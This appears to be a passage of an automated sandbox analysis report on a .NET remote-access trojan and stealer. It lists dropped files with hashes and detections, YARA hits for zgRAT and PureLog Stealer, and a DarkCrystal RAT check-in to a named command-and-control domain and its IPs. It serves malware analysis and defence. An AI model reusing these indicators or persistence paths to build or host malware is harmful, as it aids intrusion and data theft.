Encrypted:	false
SSDEEP:	3:t7Fla:tm
MD5:	40EFD71B03E55D2FABFBC7D868254A3D
SHA1:	9B84084DF7E3C9586BED2991D6B1CBC371418F2E
SHA-256:	3A447E6E6D3F292B7A9263A9B251EC80222AF0F5FA9576F12C17BDFC941E764D
SHA-512:	CF74E3D88F6FE93C9B17F2D7A4A7133DF9395E82639FC5F9D927C292BF4A5A616FBFBDC82D14D03EC0822DBFED67E2F90D77448CA5EA6F78CD4BAB74318D72E4
Malicious:	false
Preview:	oQd6QmXfOXwx24b2jZC0cJDSz

C:\Users\user\Desktop\AxEwwgFd.log

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: cbCjTbodwa.exe, Detection: malicious, Browse Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse Filename: 6G8OR42xrB.exe, Detection: malicious, Browse Filename: gkcQYEdJSO.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 150bIjWiGH.exe, Detection: malicious, Browse Filename: wmdqEYgW2i.exe, Detection: malicious, Browse Filename: 0wdppTE7Op.exe, Detection: malicious, Browse Filename: JNKHlxGvw4.exe, Detection: malicious, Browse Filename: 4si9noTBNw.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ECoURVov.log

Download File

Process:	C:\Windows\Speech\Engines\SR\Idle.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\ViwkdMoR.log

Download File

Process:	C:\Windows\Speech\Engines\SR\Idle.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\b4314c41e19997

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with very long lines (439), with no line terminators
Category:	dropped
Size (bytes):	439
Entropy (8bit):	5.856405140780344
Encrypted:	false
SSDEEP:	12:MUhjrnXdt8PW0UjcynpIVozW3DZWAUaEHEpO:l9aetR2OW4P
MD5:	7EFC70D2487EA0EA7470E8987E58E953
SHA1:	6E80ECE3D75ACBCE9B565683A6528A3BB7D519D0
SHA-256:	AD3920E3C9BF7DE3780AA3FA1956A3A1968CA3B4FC4CA7B06DF138C7C7C53321
SHA-512:	3409F51D9E9521F72E947D222D3CB989DB21602F197027D5C0F2254BF4E37638FD71908577C3C5DDE6654B4A1D92EED4DF98683176099DF8E2C591C0CD2481E3
Malicious:	false
Preview:	0YKPemEtNbMFEijvJ2HbUkMjHLd5piaiPos2EHkno7yQPpmsJ29HrBGPLlHSJJEpAoza0rrCSewXv5TcjuvxiT1Ohcqd9Rde3IPl0L2cK7zMOseQRotYYQHrwk2XAOCAARenprmX2SmldoAz8aLUhEGmBiyPTec64zL6O1kjCWgGngOIjDZkCrc6L1lH2WDYzqqodEkHzlRKiA8fUqpPE13NWPvXPcqqTIQ70jpfdSubZRYK2GxMqxT7wdROSN1W4l1auApuBJwwHcxE1keIpeAfySLWRaMPaXgyZ8a2bDKgBh0TpMWstsrZkWlbySck6gVt68p3JlrmUddRb2rEDegrqGNDW9DJkjjeLHXqhdjHBFFH2UA6kYgcAnCzvlgKiiCu49FTfAgk4ZqlBGKC9HiLDGdhFh557ZidDVM3Oqak16il7bypbdL

C:\Users\user\Desktop\fRPzNptz.log

Download File

Process:	C:\Windows\Speech\Engines\SR\Idle.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\kvKyGzpq.log

Download File

Process:	C:\Windows\Speech\Engines\SR\Idle.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nHnXqlGz.log

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\xpHnaOLh.log

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\zjWVMLxf.log

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\Speech\Engines\SR\6ccacd8608530f

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	244
Entropy (8bit):	5.82014469522904
Encrypted:	false
SSDEEP:	3:sJrMm3fNBtmMvVAFnQJouwiswTwAKk3Qeh0ZuTD5dtf1NrLde1Buz6Rm2bc37N2W:slPrtLvs8wrmwNsBH/+RdUn2Un
MD5:	65767F92DB23BB0CC60767FF7D6B0A16
SHA1:	77EC3FA1D298B45DA078CD5DBFD1D40B8EF5F4DB
SHA-256:	41539670301944F2978E1CA1AB64015F319F338BDFA793401AB9F30E1737766C
SHA-512:	70961B395FB63B7C342E1D59F86D8D9F089078EB1E0D67D7E18FA5534049CF88603205C7D8F6814D396D6A690AF72ED88CAAAA813FD16452BD530C2339709AAD
Malicious:	false
Preview:	7Fkmf0Nip3RySq7UGi2kntQedOHdMoZXqbdfQUCuu2IvJp2uBfkOn6kNyGIRstVAe4H0McEwgH0ukeUyVXcqEKtt0QqKLvCAhIRPiBijbxsfG0mUvU5VRo5TKXA6v4kuEzNcNFPUy2PQbOnAnWY0zrt2N7EKBlxhN8aQmKHqElgYZo26u9TZft5XGUPPAFSNFrDdxWYcPswNKVdiFIaCSYBdCDJR51p9TTSrkYJXk1Jx7rMv1qJ1

C:\Windows\Speech\Engines\SR\Idle.exe

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1917440
Entropy (8bit):	7.5372487343021035
Encrypted:	false
SSDEEP:	49152:9KKy7xTKloIHB26GucF5pz4YRl15u9ppVlLV39n:9KT0ewB2IG5prRTWPDLVNn
MD5:	49715A369F3516495CD8016709B367A7
SHA1:	63D60C8A36D6F7BBC8759F7FE141032393051B3C
SHA-256:	1DC5FE5617B6FD067B93358AC4829BE9683085416D80590F09BC646B49EA2B8A
SHA-512:	A7F8E8B4B8637FB7C38A59A010C6C1A5504D498FDD89247A28B504B1505F3EF9C04C8EBA0C5544F989D3EEF44DC46504DCEF69F5455CA83B7754BA82964E1D6F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\Engines\SR\Idle.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\Engines\SR\Idle.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg.................:..........^Y... ...`....@.. ....................................@..................................Y..K....`.. ............................................................................ ............... ..H............text...d9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@Y......H.......4...P................y...X.......................................0..........(.... ........8........E........`...)...M...8....(.... ....~....{....:....& ....8....(.... ....~....{q...:....& ....8....(.... ........8........0.......... ........8........E....k...w..............8f......... ....~....{n...:....& ....8........~....(Y...~....(]... ....?... ....~....{....9....& ....8\|...r...ps....z~....(Q... .... .... ....s....~....(U....... ....~....{....90...& ....8%...~..

C:\Windows\Speech\Engines\SR\Idle.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\F3ePjP272h.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.800642169534167
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX6XUxvvotb6vj:Vx993DEUFkxol8
MD5:	503657AA7111236E6A001B2583C6CE02
SHA1:	92A7563AE9F0B18200499056CF1EF371948CEBFB
SHA-256:	C56411CA7F266D415EE446673050A7B1D0F133F663DFDB235FD2DF0C51067AF6
SHA-512:	A9A1AEFFFF2175A4E5F9DA2D0844725CE3F6606A0F90E1B47C58FCACD488C81BAEC355CFC95F58FFC30E21622A8BAAE4C64378948B0057D5497C74CADFA17542
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 25/12/2024 15:10:40..15:10:40, error: 0x80072746.15:10:45, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.5372487343021035
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	F3ePjP272h.exe
File size:	1'917'440 bytes
MD5:	49715a369f3516495cd8016709b367a7
SHA1:	63d60c8a36d6f7bbc8759f7fe141032393051b3c
SHA256:	1dc5fe5617b6fd067b93358ac4829be9683085416d80590f09bc646b49ea2b8a
SHA512:	a7f8e8b4b8637fb7c38a59a010c6c1a5504d498fdd89247a28b504b1505f3ef9c04c8eba0c5544f989d3eef44dc46504dcef69f5455ca83b7754ba82964e1d6f
SSDEEP:	49152:9KKy7xTKloIHB26GucF5pz4YRl15u9ppVlLV39n:9KT0ewB2IG5prRTWPDLVNn
TLSH:	FE95AE1AB5D28F33C2A557319657493D82A1C7633512EB1B3A1F60D26D0B7F18BB22E3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg.................:..........^Y... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x5d595e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x676487A4 [Thu Dec 19 20:52:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d5910	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d6000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1d8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1d3964	0x1d3a00	adb4be1961d70e289cacc1d309962f69	False	0.7785492473603315	data	7.540707817014113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1d6000	0x320	0x400	3720f37e3ecb95f78fcf18a649002524	False	0.3525390625	data	2.6537284131589467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1d8000	0xc	0x200	17e41371da1d20822a3e062686dfd53b	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1d6058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-25T19:32:07.175909+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49704	172.67.220.198	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 25, 2024 19:32:05.648610115 CET	49704	80	192.168.2.5	172.67.220.198
Dec 25, 2024 19:32:05.769117117 CET	80	49704	172.67.220.198	192.168.2.5
Dec 25, 2024 19:32:05.769201040 CET	49704	80	192.168.2.5	172.67.220.198
Dec 25, 2024 19:32:05.769901991 CET	49704	80	192.168.2.5	172.67.220.198
Dec 25, 2024 19:32:05.889605999 CET	80	49704	172.67.220.198	192.168.2.5
Dec 25, 2024 19:32:06.129683018 CET	49704	80	192.168.2.5	172.67.220.198
Dec 25, 2024 19:32:06.249634981 CET	80	49704	172.67.220.198	192.168.2.5
Dec 25, 2024 19:32:07.121733904 CET	80	49704	172.67.220.198	192.168.2.5
Dec 25, 2024 19:32:07.175909042 CET	49704	80	192.168.2.5	172.67.220.198
Dec 25, 2024 19:32:07.354645014 CET	80	49704	172.67.220.198	192.168.2.5
Dec 25, 2024 19:32:07.410269022 CET	49704	80	192.168.2.5	172.67.220.198
Dec 25, 2024 19:32:07.740406990 CET	49704	80	192.168.2.5	172.67.220.198

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 25, 2024 19:32:05.270075083 CET	57818	53	192.168.2.5	1.1.1.1
Dec 25, 2024 19:32:05.642096043 CET	53	57818	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 25, 2024 19:32:05.270075083 CET	192.168.2.5	1.1.1.1	0xc59b	Standard query (0)	328579cm.renyash.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 25, 2024 19:32:05.642096043 CET	1.1.1.1	192.168.2.5	0xc59b	No error (0)	328579cm.renyash.ru		172.67.220.198	A (IP address)	IN (0x0001)	false
Dec 25, 2024 19:32:05.642096043 CET	1.1.1.1	192.168.2.5	0xc59b	No error (0)	328579cm.renyash.ru		104.21.38.84	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

328579cm.renyash.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.67.220.198	80	5632	C:\Windows\Speech\Engines\SR\Idle.exe

Timestamp	Bytes transferred	Direction	Data
